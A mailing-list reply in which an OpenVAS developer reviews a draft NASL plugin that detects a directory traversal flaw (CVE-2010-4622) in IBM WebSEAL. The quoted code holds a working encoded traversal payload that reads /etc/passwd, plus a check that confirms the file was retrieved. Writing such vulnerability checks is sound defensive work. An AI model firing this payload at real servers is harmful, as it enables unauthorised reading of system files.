Hello,
*** Info Sec <[email protected]> wrote:
> I attempted to look through documentation and looked at other files to
> figure out how to write one of these things. One thing that still confuses
> me is that I want the check on both port 80 and 443, but I'm not sure I'm
> doing that part right. Please feel free to shred it up, I'm hoping to learn
> more through this. There are still some lines in there I'm using for
> debugging.
> -------------------
> if( description )
> {
> script_id(33333);
> script_version ("$Revision:0.1$");
> script_name(english:"IBM Tivoli Access Manager for e-business WebSEAL URL
^^^^^^^^
There is no more "internationalization" in our Plugins. See
http://openvas.org/openvas-cr-36.html
> desc =
> "There is a directory traversal flaw in WebSEAL versions <= 6.1.1. Some
> reports show it only affecting AIX, but
> testing has shown other operating systems to be vulnerable and code
> execution has been shown to work.
>
> Risk Factor : High";
>
> script_description(desc);
> script_summary(english:"WebSEAL traversal check");
> script_category(ACT_GATHER_INFO);
This should be ACT_ATTACK in this case.
> script_family(english:"Remote file access");
> script_copyright(english:"This script is Copyright (C) 2011 name");
> script_cve_id("CVE-2010-4622");
> script_dependencie("http_version.nasl");
> script_require_ports("Services/www", 80, 443);
> exit(0);
> }
>
> include ("http_func.inc");
> include ("http_keepalive.inc");
>
> port = get_http_port(default:80);
> if(!get_port_state(port))
exit(0);
> {
> port = get_http_port(default:443);
> if(!get_port_state(port))
> exit(0);
> }
This is not needed. "port = get_http_port(default:80);" will fork for every
detected http(s) port.
> banner = get_http_banner(port:port);
if( ! banner || "WebSEAL/" >!< banner)exit(0);
> if (!ereg(pattern:"WebSEAL/[0-6].[0-1]",string:serv))
if (!ereg(pattern:"WebSEAL/[0-6].[0-1]",string:banner))
> dir_trav =
> "/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e\%uff0e%uff0e/etc/passwd";
>
> {
> req = http_get(item: dir_trav, port:port);
> res = http_keepalive_send_recv(port:port, data:req);
> if (res == NULL) exit(0);
>
> if (ereg(pattern:"HTTP/[0-9]\.[0-9] 200 ", string:res))
That's not enough to be sure the exploit is working.
if (egrep(pattern:"root:.*:0:[01]:.*:", string:res)) {
> {
> display(res);
> security_hole(port);
> exit(0);
> }
> }
Best Regards,
Micha
--
Michael Meyer OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG
Osnabrück, HR B 202460
Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner
_______________________________________________
Openvas-plugins mailing list
[email protected]
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins
